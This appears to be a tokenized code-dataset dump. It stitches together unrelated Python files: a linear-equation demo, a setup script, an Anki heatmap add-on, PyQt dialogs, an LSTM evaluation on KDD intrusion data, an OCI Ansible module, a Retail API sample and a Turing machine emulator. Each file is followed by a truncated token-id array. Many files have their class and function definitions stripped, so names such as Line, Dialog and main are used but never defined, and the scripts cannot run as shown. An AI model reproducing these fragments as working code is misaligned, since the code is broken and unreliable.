#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 10 14:22:56 2017
@author: zqzhan
"""
from decimal import Decimal,getcontext
from vector import Vector
# Work with 30 significant digits for all Decimal arithmetic in this module.
getcontext().prec = 30


if __name__ == '__main__':
    # NOTE(review): `Line` is not defined or imported in this chunk — its
    # definition appears to have been stripped; confirm against the full file.
    # Each Line seems to be built from a normal vector and a constant term
    # (ax + by = k) — verify against the Line constructor.
    line1 = Line(Vector([1, 2]), 4)
    line2 = Line(Vector([2 , 5]), 9)
    # NOTE(review): "instersects" is a typo in the printed output; it is a
    # runtime string, so it is only flagged here, not altered.
    print ('first system instersects in:' )
    print (line1.intersection(line2))

    # second system
    # 7.204x + 3.182y = 8.68
    # 8.172x + 4.114y = 9.883
    line3 = Line(Vector([7.204, 3.182]), 8.68)
    line4 = Line(Vector([8.172, 4.114]), 9.883)
    print (str(line3))
    print ('second system instersects in: {}'.format(line3.intersection(line4)))

    # third system
    # 1.182x + 5.562y = 6.744
    # 1.773x + 8.343y = 9.525
    line5 = Line(Vector([1.182, 5.562]), 6.744)
    line6 = Line(Vector([1.773, 8.343]), 9.525)
    print ('third system instersects in: {}'.format(line5.intersection(line6)))
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
19480,
5267,
838,
1478,
25,
1828,
25,
3980,
2177,
198,
198,
31,
9800,
25,
1976,
80,
89,
... | 2.288889 | 405 |
from argparse import ArgumentParser
from os import system as execute, listdir, rmdir, mkdir
from shutil import copy as copy_file
if __name__ == '__main__':
    # Single optional positional argument selecting what to set up;
    # defaults to 'everything' when omitted.
    parser = ArgumentParser(description='Setup the system.')
    parser.add_argument('object', default='everything', nargs='?',
                        choices=['everything', 'bash', 'git'],
                        metavar='{everything, bash, git}',
                        help='Object on which to perform the setup.')
    arg = parser.parse_args().object
    # NOTE(review): setup_bash, configure_dirs, install_and_configure_*,
    # and install_applications are not defined in this chunk — presumably
    # defined earlier in the full file; verify before refactoring.
    if arg == 'bash':
        setup_bash()
    elif arg == 'git':
        install_and_configure_git()
    else:
        # 'everything': run the full setup sequence in order.
        setup_bash()
        configure_dirs()
        install_and_configure_yandex_disk()
        install_and_configure_git()
        install_applications()
| [
6738,
1822,
29572,
1330,
45751,
46677,
198,
6738,
28686,
1330,
1080,
355,
12260,
11,
1351,
15908,
11,
374,
9132,
343,
11,
33480,
15908,
198,
6738,
4423,
346,
1330,
4866,
355,
4866,
62,
7753,
628,
628,
628,
198,
198,
361,
11593,
3672,
... | 2.336283 | 339 |
# -*- coding: utf-8 -*-
# Review Heatmap Add-on for Anki
#
# Copyright (C) 2016-2018 Aristotelis P. <https//glutanimate.com/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version, with the additions
# listed at the end of the accompanied license file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# NOTE: This program is subject to certain additional terms pursuant to
# Section 7 of the GNU Affero General Public License. You should have
# received a copy of these additional terms immediately following the
# terms and conditions of the GNU Affero General Public License which
# accompanied this program.
#
# If not, please request a copy through one of the means of contact
# listed here: <https://glutanimate.com/contact/>.
#
# Any modifications to this file must keep this entire header intact.
"""
Static web components and templates
"""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from .libaddon.platform import JSPY_BRIDGE, ANKI21, PLATFORM
__all__ = ["html_main_element", "html_heatmap",
"html_streak", "html_info_nodata"]
html_main_element = """
<script type="text/javascript" src="qrc:/review_heatmap/web/d3.min.js"></script>
<script type="text/javascript" src="qrc:/review_heatmap/web/cal-heatmap.js"></script>
<link rel="stylesheet" href="qrc:/review_heatmap/web/cal-heatmap.css">
<script type="text/javascript" src="qrc:/review_heatmap/web/review-heatmap.js"></script>
<link rel="stylesheet" href="qrc:/review_heatmap/web/review-heatmap.css">
<script>
var pybridge = function(arg){{{{
{bridge}(arg);
}}}};
var rhAnki21 = "{anki21}" === "True";
var rhPlatform = "{platform}";
</script>
<div class="rh-container {{classes}}">
{{content}}
</div>
""".format(bridge=JSPY_BRIDGE, anki21=ANKI21, platform=PLATFORM)
html_heatmap = """
<div class="heatmap">
<div class="heatmap-controls">
<div class="alignleft">
<span> </span>
</div>
<div class="aligncenter">
<div title="Go back\n(Shift-click for first year)" onclick="onHmNavigate(event, this, 'prev');" class="hm-btn">
<img height="10px" src="qrc:/review_heatmap/icons/left.svg" />
</div>
<div title="Today" onclick="onHmHome(event, this);" class="hm-btn">
<img height="10px" src="qrc:/review_heatmap/icons/circle.svg" />
</div>
<div title="Go forward\n(Shift-click for last year)" onclick="onHmNavigate(event, this, 'next');" class="hm-btn">
<img height="10px" src="qrc:/review_heatmap/icons/right.svg" />
</div>
</div>
<div class="alignright">
<div class="hm-btn opts-btn" title="Options" onclick="onHmOpts(event, this);">
<img src="qrc:/review_heatmap/icons/options.svg" />
</div>
<div class="hm-btn opts-btn" title="Support this add-on" onclick="onHmContrib(event, this);">
<img src="qrc:/review_heatmap/icons/heart_bw.svg" />
</div>
</div>
<div style="clear: both;"> </div>
</div>
<div id="cal-heatmap"></div>
</div>
<script type="text/javascript">
cal = initHeatmap({options}, {data});
</script>
"""
html_streak = """
<div class="streak">
<span class="streak-info">Daily average:</span>
<span title="Average reviews on active days"
class="sstats {class_activity_daily_avg}">{text_activity_daily_avg}</span>
<span class="streak-info">Days learned:</span>
<span title="Percentage of days with review activity over entire review history"
class="sstats {class_pct_days_active}">{text_pct_days_active}%</span>
<span class="streak-info">Longest streak:</span>
<span title="Longest continuous streak of review activity. All types of repetitions included."
class="sstats {class_streak_max}">{text_streak_max}</span>
<span class="streak-info">Current streak:</span>
<span title="Current card review activity streak. All types of repetitions included."
class="sstats {class_streak_cur}">{text_streak_cur}</span>
</div>
"""
html_info_nodata = """
No activity data to show (<span class="linkspan" onclick='pybridge("revhm_opts");'>options</span>).
"""
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
6602,
12308,
8899,
3060,
12,
261,
329,
1052,
4106,
198,
2,
198,
2,
15069,
357,
34,
8,
1584,
12,
7908,
220,
23203,
313,
417,
271,
350,
13,
1279,
5450,
1003,
... | 2.659856 | 1,811 |
from stacknet.stacknet_funcs.sparse_funcs import from_sparse_to_file
from stacknet.stacknet_funcs.datetime_funcs import getTimeFeatures
from stacknet.stacknet_funcs.cat_feature_engineering import getCatFeatures
| [
6738,
8931,
3262,
13,
25558,
3262,
62,
12543,
6359,
13,
82,
29572,
62,
12543,
6359,
1330,
422,
62,
82,
29572,
62,
1462,
62,
7753,
198,
6738,
8931,
3262,
13,
25558,
3262,
62,
12543,
6359,
13,
19608,
8079,
62,
12543,
6359,
1330,
651,
... | 3.246154 | 65 |
#!/usr/bin/env python3
# Copyright (c) 2008-9 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License, or
# version 3 of the License, or (at your option) any later version. It is
# provided for educational purposes and is distributed in the hope that
# it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License for more details.
import sys
from PyQt4.QtCore import (QString, Qt, SIGNAL)
from PyQt4.QtGui import (QApplication, QBoxLayout, QDialog,
QDialogButtonBox, QGridLayout, QLabel, QLineEdit, QTextEdit,
QVBoxLayout, QWidget)
# Layout-position constants: label to the LEFT of, or ABOVE, its widget.
LEFT, ABOVE = range(2)


if __name__ == "__main__":
    # Demo data used to pre-populate the dialog's fields.
    fakeAddress = dict(street="3200 Mount Vernon Memorial Highway",
                       city="Mount Vernon", state="Virginia",
                       zipcode="22121")
    app = QApplication(sys.argv)
    # NOTE(review): `Dialog` is not defined in this chunk — its definition
    # appears to have been stripped; the attribute accesses below (street,
    # city, state, notes with .lineEdit/.textEdit) document its expected
    # interface. Verify against the full file.
    form = Dialog(fakeAddress)
    form.show()
    app.exec_()
    # After the event loop exits, echo whatever the user left in the fields.
    print("Street:", str(form.street.lineEdit.text()))
    print("City:", str(form.city.lineEdit.text()))
    print("State:", str(form.state.lineEdit.text()))
    print("Notes:")
    print(str(form.notes.textEdit.toPlainText()))
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
15069,
357,
66,
8,
3648,
12,
24,
1195,
2213,
330,
12052,
13,
1439,
2489,
10395,
13,
198,
2,
770,
1430,
393,
8265,
318,
1479,
3788,
25,
345,
460,
17678,
4163,
340,
290,
14,
... | 2.863544 | 491 |
from __future__ import print_function
from sklearn.cross_validation import train_test_split
import pandas as pd
import numpy as np
np.random.seed(1337) # for reproducibility
from keras.preprocessing import sequence
from keras.utils import np_utils
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Embedding
from keras.layers import LSTM, SimpleRNN, GRU
from keras.datasets import imdb
from keras.utils.np_utils import to_categorical
from sklearn.metrics import (precision_score, recall_score,f1_score, accuracy_score,mean_squared_error,mean_absolute_error)
from sklearn import metrics
from sklearn.preprocessing import Normalizer
import h5py
from keras import callbacks
from keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, CSVLogger
# Load the KDD binary-classification TEST split: column 0 is the label,
# columns 1..41 are the 41 features.
testdata = pd.read_csv('kdd/binary/kddtest.csv', header=None)
C = testdata.iloc[:,0]
T = testdata.iloc[:,1:42]

# Unit-norm scaling fitted on the same data it transforms (test-only script).
scaler = Normalizer().fit(T)
testT = scaler.transform(T)

# summarize transformed data
np.set_printoptions(precision=3)
#print(testT[0:5,:])

y_test = np.array(C)

# reshape input to be [samples, time steps, features]
# NOTE(review): despite the name, X_train holds the TEST features — the
# whole script only evaluates a pre-trained model. Renaming would touch
# every use below, so it is only flagged here.
X_train = np.reshape(testT, (testT.shape[0], 1, testT.shape[1]))
# Unused in this evaluation-only script (no fit() call is active); kept
# because the commented-out training code at the bottom references it.
batch_size = 32

# 1. define the network: single 4-unit LSTM over the 41 features, dropout,
# and a sigmoid output for binary (attack / normal) classification. The
# architecture must match the checkpoint being restored below.
model = Sequential()
model.add(LSTM(4,input_dim=41))  # try using a GRU instead, for fun
model.add(Dropout(0.1))
model.add(Dense(1))
model.add(Activation('sigmoid'))

# Restore pre-trained weights, then compile so evaluate()/predict() work.
model.load_weights("kddresults/lstm1layer/checkpoint-51.hdf5")
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
# Ground-truth labels (alias kept for compatibility with the code below).
y_train1 = y_test
# Hard class predictions (0/1) from the restored model.
y_pred = model.predict_classes(X_train)

# Standard binary-classification metrics against the ground truth.
accuracy = accuracy_score(y_train1, y_pred)
recall = recall_score(y_train1, y_pred, average="binary")
precision = precision_score(y_train1, y_pred, average="binary")
f1 = f1_score(y_train1, y_pred, average="binary")

print("confusion matrix")
print("----------------------------------------------")
print("accuracy")
print("%.3f" % accuracy)
# BUGFIX: this label used to read "racall" — fixed the typo so the printed
# report is correct and grep-able.
print("recall")
print("%.3f" % recall)
print("precision")
print("%.3f" % precision)
print("f1score")
print("%.3f" % f1)
cm = metrics.confusion_matrix(y_train1, y_pred)
print("==============================================")
print("==============================================")
print(cm)
# NOTE(review): these index assignments treat row/column 0 as the positive
# class, but sklearn orders the confusion matrix by sorted label value
# (row 0 = label 0). Whether tp/fp/tn/fn are labelled correctly depends on
# which label encodes "attack" — verify against the dataset encoding.
tp = cm[0][0]
fp = cm[0][1]
tn = cm[1][1]
fn = cm[1][0]
print("tp")
print(tp)
print("fp")
print(fp)
print("tn")
print(tn)
print("fn")
print(fn)
print("tpr")
tpr = float(tp)/(tp+fn)
print("fpr")
fpr = float(fp)/(fp+tn)
# NOTE(review): the "LSTM acc" header is followed by tpr and fpr, not
# accuracy — misleading but preserved (runtime output).
print("LSTM acc")
print(tpr)
print(fpr)

# Re-compile (redundant — already compiled above) and report Keras' own
# loss/accuracy over the same data.
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
loss, accuracy = model.evaluate(X_train, y_train1)
print("\nLoss: %.2f, Accuracy: %.2f%%" % (loss, accuracy*100))
# Raw class probabilities, echoed and persisted for later analysis.
t_probs = model.predict_proba(X_train)
print(t_probs)
np.savetxt('prob.txt', t_probs)
print(t_probs.shape)
# The two triple-quoted blocks below are DISABLED code (string-literal
# no-ops): the original training loop with checkpoint/CSV callbacks, and an
# alternative evaluation snippet. Kept byte-identical for reference; note
# they reference y_train/X_test, which this evaluation-only script never
# defines, so they could not be re-enabled as-is.
'''
# try using different optimizers and different optimizer configs
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
checkpointer = callbacks.ModelCheckpoint(filepath="kddresults/lstm1layer/checkpoint-{epoch:02d}.hdf5", verbose=1, save_best_only=True, monitor='val_acc',mode='max')
csv_logger = CSVLogger('training_set_iranalysis.csv',separator=',', append=False)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=1000, validation_data=(X_test, y_test),callbacks=[checkpointer,csv_logger])
model.save("kddresults/lstm1layer/fullmodel/lstm1layer_model.hdf5")
loss, accuracy = model.evaluate(X_test, y_test)
print("\nLoss: %.2f, Accuracy: %.2f%%" % (loss, accuracy*100))
y_pred = model.predict_classes(X_test)
np.savetxt('kddresults/lstm1layer/lstm1predicted.txt', y_pred, fmt='%01d')
'''
'''
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
loss, accuracy = model.evaluate(X_train, y_train1)
print("\nLoss: %.2f, Accuracy: %.2f%%" % (loss, accuracy*100))
'''
| [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
1341,
35720,
13,
19692,
62,
12102,
341,
1330,
4512,
62,
9288,
62,
35312,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
299,
32152,
355,
45941,
198,
37659,
13,
25120,
13,
28... | 2.685655 | 1,457 |
#!/usr/bin/python
# Copyright (c) 2017, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Ansible module metadata consumed by ansible-doc tooling (generated file —
# manual changes are overwritten by the code generator).
ANSIBLE_METADATA = {
    "metadata_version": "1.1",
    "status": ["preview"],
    "supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_blockstorage_boot_volume_backup
short_description: Manage a BootVolumeBackup resource in Oracle Cloud Infrastructure
description:
- This module allows the user to create, update and delete a BootVolumeBackup resource in Oracle Cloud Infrastructure
- For I(state=present), creates a new boot volume backup of the specified boot volume. For general information about boot volume backups,
see L(Overview of Boot Volume Backups,https://docs.cloud.oracle.com/Content/Block/Concepts/bootvolumebackups.htm)
- When the request is received, the backup object is in a REQUEST_RECEIVED state.
When the data is imaged, it goes into a CREATING state.
After the backup is fully uploaded to the cloud, it goes into an AVAILABLE state.
- "This resource has the following action operations in the M(oci_boot_volume_backup_actions) module: copy."
version_added: "2.9"
author: Oracle (@oracle)
options:
boot_volume_id:
description:
- The OCID of the boot volume that needs to be backed up.
- Required for create using I(state=present).
type: str
defined_tags:
description:
- Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
- This parameter is updatable.
type: dict
display_name:
description:
- A user-friendly name for the boot volume backup. Does not have to be unique and it's changeable.
Avoid entering confidential information.
- Required for create, update, delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
- This parameter is updatable when C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
type: str
aliases: ["name"]
freeform_tags:
description:
- Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see L(Resource
Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Department\\": \\"Finance\\"}`"
- This parameter is updatable.
type: dict
type:
description:
- The type of backup to create. If omitted, defaults to incremental.
type: str
choices:
- "FULL"
- "INCREMENTAL"
boot_volume_backup_id:
description:
- The OCID of the boot volume backup.
- Required for update using I(state=present) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
- Required for delete using I(state=absent) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
type: str
aliases: ["id"]
compartment_id:
description:
- The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the compartment.
- Required for create using I(state=present).
- Required for update when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
- Required for delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
type: str
state:
description:
- The state of the BootVolumeBackup.
- Use I(state=present) to create or update a BootVolumeBackup.
- Use I(state=absent) to delete a BootVolumeBackup.
type: str
required: false
default: 'present'
choices: ["present", "absent"]
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_creatable_resource, oracle.oci.oracle_wait_options ]
"""
EXAMPLES = """
- name: Create boot_volume_backup
oci_blockstorage_boot_volume_backup:
boot_volume_id: ocid1.bootvolume.oc1..xxxxxxEXAMPLExxxxxx
compartment_id: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx
- name: Update boot_volume_backup using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_blockstorage_boot_volume_backup:
defined_tags: {'Operations': {'CostCenter': 'US'}}
display_name: display_name_example
freeform_tags: {'Department': 'Finance'}
compartment_id: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx
- name: Update boot_volume_backup
oci_blockstorage_boot_volume_backup:
defined_tags: {'Operations': {'CostCenter': 'US'}}
display_name: display_name_example
boot_volume_backup_id: ocid1.bootvolumebackup.oc1..xxxxxxEXAMPLExxxxxx
- name: Delete boot_volume_backup
oci_blockstorage_boot_volume_backup:
boot_volume_backup_id: ocid1.bootvolumebackup.oc1..xxxxxxEXAMPLExxxxxx
state: absent
- name: Delete boot_volume_backup using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_blockstorage_boot_volume_backup:
display_name: display_name_example
compartment_id: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx
state: absent
"""
RETURN = """
boot_volume_backup:
description:
- Details of the BootVolumeBackup resource acted upon by the current operation
returned: on success
type: complex
contains:
boot_volume_id:
description:
- The OCID of the boot volume.
returned: on success
type: string
sample: ocid1.bootvolume.oc1..xxxxxxEXAMPLExxxxxx
compartment_id:
description:
- The OCID of the compartment that contains the boot volume backup.
returned: on success
type: string
sample: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx
defined_tags:
description:
- Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
system_tags:
description:
- "System tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\\"foo-namespace\\": {\\"bar-key\\": \\"value\\"}}`"
returned: on success
type: dict
sample: {}
display_name:
description:
- A user-friendly name for the boot volume backup. Does not have to be unique and it's changeable.
Avoid entering confidential information.
returned: on success
type: string
sample: display_name_example
expiration_time:
description:
- The date and time the volume backup will expire and be automatically deleted.
Format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339). This parameter will always be present for backups that
were created automatically by a scheduled-backup policy. For manually created backups,
it will be absent, signifying that there is no expiration time and the backup will
last forever until manually deleted.
returned: on success
type: string
sample: 2013-10-20T19:20:30+01:00
freeform_tags:
description:
- Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see L(Resource
Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
id:
description:
- The OCID of the boot volume backup.
returned: on success
type: string
sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx
image_id:
description:
- The image OCID used to create the boot volume the backup is taken from.
returned: on success
type: string
sample: ocid1.image.oc1..xxxxxxEXAMPLExxxxxx
kms_key_id:
description:
- The OCID of the Key Management master encryption assigned to the boot volume backup.
For more information about the Key Management service and encryption keys, see
L(Overview of Key Management,https://docs.cloud.oracle.com/Content/KeyManagement/Concepts/keyoverview.htm) and
L(Using Keys,https://docs.cloud.oracle.com/Content/KeyManagement/Tasks/usingkeys.htm).
returned: on success
type: string
sample: ocid1.kmskey.oc1..xxxxxxEXAMPLExxxxxx
lifecycle_state:
description:
- The current state of a boot volume backup.
returned: on success
type: string
sample: CREATING
size_in_gbs:
description:
- The size of the boot volume, in GBs.
returned: on success
type: int
sample: 56
source_boot_volume_backup_id:
description:
- The OCID of the source boot volume backup.
returned: on success
type: string
sample: ocid1.sourcebootvolumebackup.oc1..xxxxxxEXAMPLExxxxxx
source_type:
description:
- Specifies whether the backup was created manually, or via scheduled backup policy.
returned: on success
type: string
sample: MANUAL
time_created:
description:
- The date and time the boot volume backup was created. This is the time the actual point-in-time image
of the volume data was taken. Format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
returned: on success
type: string
sample: 2013-10-20T19:20:30+01:00
time_request_received:
description:
- The date and time the request to create the boot volume backup was received. Format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
returned: on success
type: string
sample: 2013-10-20T19:20:30+01:00
type:
description:
- The type of a volume backup.
returned: on success
type: string
sample: FULL
unique_size_in_gbs:
description:
- The size used by the backup, in GBs. It is typically smaller than sizeInGBs, depending on the space
consumed on the boot volume and whether the backup is full or incremental.
returned: on success
type: int
sample: 56
sample: {
"boot_volume_id": "ocid1.bootvolume.oc1..xxxxxxEXAMPLExxxxxx",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"defined_tags": {'Operations': {'CostCenter': 'US'}},
"system_tags": {},
"display_name": "display_name_example",
"expiration_time": "2013-10-20T19:20:30+01:00",
"freeform_tags": {'Department': 'Finance'},
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"image_id": "ocid1.image.oc1..xxxxxxEXAMPLExxxxxx",
"kms_key_id": "ocid1.kmskey.oc1..xxxxxxEXAMPLExxxxxx",
"lifecycle_state": "CREATING",
"size_in_gbs": 56,
"source_boot_volume_backup_id": "ocid1.sourcebootvolumebackup.oc1..xxxxxxEXAMPLExxxxxx",
"source_type": "MANUAL",
"time_created": "2013-10-20T19:20:30+01:00",
"time_request_received": "2013-10-20T19:20:30+01:00",
"type": "FULL",
"unique_size_in_gbs": 56
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceHelperBase,
get_custom_class,
)
try:
from oci.core import BlockstorageClient
from oci.core.models import CreateBootVolumeBackupDetails
from oci.core.models import UpdateBootVolumeBackupDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class BootVolumeBackupHelperGen(OCIResourceHelperBase):
"""Supported operations: create, update, get, list and delete"""
BootVolumeBackupHelperCustom = get_custom_class("BootVolumeBackupHelperCustom")
if __name__ == "__main__":
main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
15069,
357,
66,
8,
2177,
11,
33448,
18650,
290,
14,
273,
663,
29116,
13,
198,
2,
770,
3788,
318,
925,
1695,
284,
345,
739,
262,
2846,
286,
262,
38644,
513,
13,
15,
5964,
393,
262,
24... | 2.356274 | 5,754 |
# This is the ball class that handles everything related to Balls
# The __init__ method is used to initialize class variables
# The display method handles drawing the ball
# The move method handles moving the Ball
# The add_force method adds a force to the acceleration of the Ball
# check_ground checks if the ball falls off the bottom of the screen.
# if it is off the screen, the ball bounces up
gravity = PVector(0, 1)
# creating a new ball at position 250, 250 with velocity and acceleration 0
b = Ball(PVector(250, 250), PVector(0, 0), PVector(0, 0))
| [
2,
770,
318,
262,
2613,
1398,
326,
17105,
2279,
3519,
284,
39332,
198,
220,
220,
220,
1303,
383,
11593,
15003,
834,
2446,
318,
973,
284,
41216,
1398,
9633,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
383,
3359,
2446,
17105,
8... | 3.397727 | 176 |
a,b = map(int, input().split())
print(process(a,b,0))
| [
198,
220,
220,
220,
220,
198,
198,
64,
11,
65,
796,
3975,
7,
600,
11,
5128,
22446,
35312,
28955,
198,
4798,
7,
14681,
7,
64,
11,
65,
11,
15,
4008,
198
] | 1.967742 | 31 |
# Copyright 2021 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START retail_rejoin_user_event]
# Import user events into a catalog from inline source using Retail API
#
import os
from google.api_core.client_options import ClientOptions
from google.cloud.retail import UserEventServiceClient, \
RejoinUserEventsRequest
from setup.setup_cleanup import write_user_event, purge_user_event
project_number = os.getenv('PROJECT_NUMBER')
endpoint = "retail.googleapis.com"
default_catalog = "projects/{0}/locations/global/catalogs/default_catalog".format(
project_number)
visitor_id = 'test_visitor_id'
# get user events service client
# get rejoin user event request
# call the Retail API to rejoin user event
write_user_event(visitor_id)
call_rejoin_user_events()
purge_user_event(visitor_id)
# [END retail_rejoin_user_event]
| [
2,
15069,
33448,
3012,
3457,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
... | 3.365854 | 410 |
##############################################################################
# This Python code has been written to emulate a simple Turing Machine.
# Inspiration has been drawn from references such as the following:
#
# https://www.cs.virginia.edu/~robins/Turing_Paper_1936.pdf
# https://www.cl.cam.ac.uk/projects/raspberrypi/tutorials/turing-machine/one.html
# https://www.i-programmer.info/babbages-bag/23-turing-machines.html
# https://www.youtube.com/watch?v=DILF8usqp7M
# http://www.ams.org/publicoutreach/feature-column/fcarc-turing
# http://www.aturingmachine.com/examples.php
# http://www.aturingmachine.com/examplesSub.php
# https://www.cl.cam.ac.uk/projects/raspberrypi/tutorials/turing-machine/four.html
#
# We take a few liberties in the definition of 'Turing Machine' (TM). For example, we
# allow 'jumps' of more (or less) than 1 tape cell location either side. For larger jumps
# we are saving ourselves the considerable inconvenience and verbosity of the need to define
# many intermediate states, which the 1-step TM would need to do if it wished to carry
# out larger jumps. We also allow our TM to write out an 'E' symbol (and halt) if it
# encounters an error condition.
#
# To configure the machine to run the desired program on the desired tape at the desired
# starting cell, a few minor hand-hacks are required by the user, in order to set the values of the
# following variables, within main:
#
# state_machine = PROGRAM_08 # <------------------------------------------------------ Choose here the program you wish to run
# current_tape = TAPE_02; current_tape_index = START_CELL_INDEX_02 # <------------------------------ Choose desired tape and start cell index
#
# This code has been written in Python 3.8.0 (but should be compatible with earlier versions of Python3)
#
# License:
# MIT License (see https://github.com/deebs67/TMulator/blob/master/LICENSE)
#
# Copyright (c) 2020 deebs67
#
##############################################################################
# Global module imports
##############################################################################
#
from TMulator_programming import * # Import additional TM programs, tapes and start cells from companion module
# I don't normally like 'import *', but I think it is justifiable here.
##############################################################################
# Turing Machine emulator function
##############################################################################
#
# Function to execute a step of the TM
##############################################################################
# TM Initialisation and program/data options
##############################################################################
#
# Various top-level parameters
START_CARD_INDEX = 1 # We always start on card index 1, and stop (halt) on card index 0
MAX_NUMBER_OF_STEPS = 20 # Will take fewer steps if it halts earlier than this
#
# Write a (state machine) program in terms of 'cards' (one for each state), which defines the 'program'. For the top-level dict, the
# key is the state, and the value is a card for that state (itself represented as a dict of dicts, keyed by current symbol on the tape,
# where the inner dicts are the corresponding value, which define the 'actions' to take, given that symbol on the tape).
# The halting state is 0, which doesn't need a card to be defined for it, so we just make a placemarker card for card 0
PROGRAM_00 = { # This program replaces a zero with a blank to the right hand end of a line of 1s (of arbitrary length), and then simply halts
0: 'Placemarker card for halting state 0',
1: { # In this state we step over every 1, re-writing it and stepping right
'_': { 'write': '_', 'step': +1, 'next_state': 1}, # Step right of the blank, and stay in this state
0: { 'write': '_', 'step': 0, 'next_state': 0}, # We must be off the RHS end. Write a blank and halt
1: { 'write': 1, 'step': +1, 'next_state': 1} # Write a 1, step right and stay in this state
},
}
#
# Define the tape starting condition and start cell index
TAPE_00 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '_', 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]; START_CELL_INDEX_00 = 15 # For writing a blank at the end of a line of 1's
##############################################################################
# Main loop
##############################################################################
#
if __name__=='__main__':
    #
